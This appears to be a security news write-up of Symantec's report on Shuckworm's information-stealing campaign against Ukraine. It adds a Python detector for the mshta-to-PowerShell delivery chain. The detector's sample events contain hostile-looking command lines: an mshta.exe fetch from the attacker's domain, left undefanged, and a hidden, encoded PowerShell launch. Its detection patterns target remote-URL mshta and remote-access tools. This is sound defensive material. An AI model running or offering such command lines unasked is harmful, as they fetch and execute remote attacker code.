- Recent Shuckworm activity targets Ukraine, delivering information-stealing malware to the networks of chosen victims.
- The first suspicious activity seen on victim systems was a self-extracting 7-Zip file downloaded via the browser.
- The legitimate remote desktop tools Ammyy Admin and AnyDesk were also used by the attackers for remote access.
Symantec, a division of Broadcom Software, reports that the Russia-linked group Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa, is still using information-stealing malware against Ukrainian networks. The company stated that one of the group's recent attacks took place on 8 August and that the campaign is consistent with activity described in a report by the Computer Emergency Response Team of Ukraine (CERT-UA).
Infection vector
Symantec observed a self-extracting 7-Zip file on victims' systems. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTA file. The files were downloaded from a0698649[.]xsph[.]ru, a domain associated with Shuckworm activity.
Once the XML file is downloaded, it executes a PowerShell stealer. Three versions of the stealer exist, and more than one can be present on a single system; running multiple versions simultaneously is a way of evading detection. Symantec also found backdoors belonging to Pterodo, a known Shuckworm tool. These backdoors can invoke PowerShell, upload screenshots, and execute code received from a command-and-control server. One backdoor had the file name 4896.exe and had multiple capabilities, including:
- Record audio using the microphone and upload the recorded files to a remote location
- Take screenshots and upload them
- Log and upload keystrokes
- Download and execute .exe files or download and load DLL files
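The delivery chain described above (SFX archive, then mshta.exe fetching a remote file, then a PowerShell stealer, with legitimate remote-access tools alongside) maps onto a few process-creation checks a defender can run over endpoint telemetry. The following is an added example, not code from Symantec or from the report; the Sysmon-style events are constructed, and the URL path, pids and local file names are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events, not real telemetry. The domain is the
# one named above; the URL path, pids and local file names are made-up assumptions.
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Users\u\Downloads\archive.exe",  # SFX 7-Zip
     "cmdline": "archive.exe"},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://a0698649.xsph.ru/placeholder.xml"},
    {"pid": 40, "ppid": 30,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc AAAA"},
    {"pid": 50, "ppid": 10, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # benign local HTA
    {"pid": 60, "ppid": 10, "image": r"C:\Users\u\AppData\Local\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe"},
]

MSHTA_REMOTE = re.compile(r"\bhttps?://", re.IGNORECASE)      # mshta handed a URL, not a local .hta
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
REMOTE_TOOLS = re.compile(r"anydesk|ammyy", re.IGNORECASE)    # legitimate tools: corroborate, do not auto-block

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Walk ppid links back to the root so the analyst sees the whole delivery chain."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < 64:  # depth cap also guards against ppid cycles
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]

def detect(events):
    """Return (rule, pid, severity) for each event matching a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, parent = basename(e["image"]), by_pid.get(e["ppid"])
        if name == "mshta.exe" and MSHTA_REMOTE.search(e["cmdline"]):
            findings.append(("mshta_remote_url", e["pid"], "high"))
        if POWERSHELL.search(e["image"]) and parent and basename(parent["image"]) == "mshta.exe":
            findings.append(("powershell_from_mshta", e["pid"], "high"))
        if REMOTE_TOOLS.search(e["image"]):
            findings.append(("remote_access_tool", e["pid"], "info"))
    return findings
```

The local-HTA mshta event is deliberately left unflagged, and the remote-access tool hit is informational only, since both tools are legitimate software and the finding needs the surrounding chain before it means anything.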
Symantec said,
« As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations. »